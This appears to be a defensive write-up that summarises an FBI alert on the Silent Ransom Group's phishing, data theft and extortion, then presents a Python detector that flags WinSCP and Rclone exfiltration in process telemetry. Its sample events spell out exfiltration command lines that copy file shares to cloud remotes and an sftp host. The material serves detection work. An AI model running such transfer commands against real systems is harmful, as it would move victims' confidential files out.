Overview
- In a spring 2026 flash alert, the FBI warned that the Silent Ransom Group (SRG) uses callback phishing (lure emails that prompt the recipient to call a number the attackers control) and direct phone calls to impersonate a company's IT staff and talk employees into granting remote access.
- If remote desktop access fails, the group sends a person to the victim's office to plug in a USB stick or external hard drive and copy data directly from the machines.
- After gaining access, SRG escalates privileges and exfiltrates files, either with legitimate transfer utilities such as WinSCP or Rclone or by uploading data to cloud storage accounts such as Google Drive and OneDrive. Because these are ordinary administrative tools rather than malware, detection has to key on how they are invoked and where the data goes, not on file signatures.
- The group then extorts victims by threatening to sell or publish the stolen files and by calling employees and clients to increase pressure, which damages client confidentiality and trust at the law and financial firms it targets.
- The FBI recommends verifying the identity of anyone claiming to be IT personnel before granting access, blocking the installation and use of removable storage devices, restricting the ports used by remote-access tools, enforcing least-privilege access and phishing-resistant multi-factor authentication, and keeping offline backups to limit the damage.
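The exfiltration step above relies on legitimate tools, so a practical control is a behavioural detection over process-creation telemetry. The following is an added example, not code from the FBI alert or from any vendor: it classifies constructed Sysmon-style process events (the `ProcessEvent` fields, the `classify`/`scan` functions and the sample events are all assumptions made for this illustration) and flags WinSCP and Rclone executions, including an Rclone binary that has been renamed but still names a cloud remote on its command line.

```python
"""Flag process-creation events that look like SRG-style data exfiltration.

Added example (not from the FBI alert). Assumed input: Sysmon-style process
creation events reduced to image path, command line and user.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Transfer utilities the alert names; an exact image-name match is high severity.
EXFIL_IMAGES = {"rclone.exe", "winscp.exe", "winscp.com"}

# Rclone sub-commands that move data.
RCLONE_VERB = re.compile(r"\b(copy|sync|move|copyto|mount)\b", re.IGNORECASE)

# An rclone remote looks like "name:path". Requiring two or more characters
# before the colon keeps Windows drive letters ("C:\...") from matching, and
# the negative lookahead excludes URL schemes such as "https://".
RCLONE_REMOTE = re.compile(r"(?<![\w\\/])[A-Za-z][\w-]+:(?!//)[\w./\\-]*")


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the executable that started
    command_line: str   # full command line as logged
    user: str           # account the process runs as


@dataclass(frozen=True)
class Finding:
    severity: str
    reason: str
    event: ProcessEvent


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcessEvent) -> Optional[Finding]:
    """Return a Finding if the event matches an exfiltration pattern, else None."""
    name = _basename(ev.image)
    if name in EXFIL_IMAGES:
        return Finding("high", f"known exfiltration tool executed: {name}", ev)

    cmd = ev.command_line
    # A renamed rclone still has to say what to do (verb) and where to send
    # it (remote) or where its config lives; cmd.exe "copy C:\a D:\b" does not
    # match because drive letters are not treated as remotes.
    if RCLONE_VERB.search(cmd) and (
        RCLONE_REMOTE.search(cmd) or "rclone.conf" in cmd.lower()
    ):
        return Finding("high", f"rclone-style remote transfer from {name}", ev)
    return None


def scan(events: List[ProcessEvent]) -> List[Finding]:
    """Classify every event and return only the ones that produced a Finding."""
    return [f for f in (classify(e) for e in events) if f is not None]


# Constructed sample telemetry (assumed data, not from a real incident).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Tools\rclone.exe",
                 r'rclone.exe copy "C:\Shares\Legal" gdrive:legal --transfers 16',
                 "CORP\\jdoe"),
    ProcessEvent(r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe",
                 r'svchost.exe sync "C:\Users\jdoe\Documents" onedrive:docs -P',
                 "CORP\\jdoe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c copy C:\a.txt D:\b.txt",
                 "CORP\\jdoe"),
    ProcessEvent(r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
                 r'WinSCP.exe /console /command "open sftp://u@203.0.113.10"',
                 "CORP\\jdoe"),
    ProcessEvent(r"C:\Windows\System32\robocopy.exe",
                 r"robocopy.exe C:\src \\fileserver\dst /E",
                 "CORP\\backupsvc"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity}] {finding.reason}: {finding.event.command_line}")
```

Running the block prints three findings (the Rclone, renamed-Rclone and WinSCP events) and stays silent on the cmd.exe and robocopy copies. In production the same logic would sit on Sysmon event ID 1 or Windows event 4688 with command-line logging enabled; without command-line auditing the renamed-binary branch has nothing to inspect.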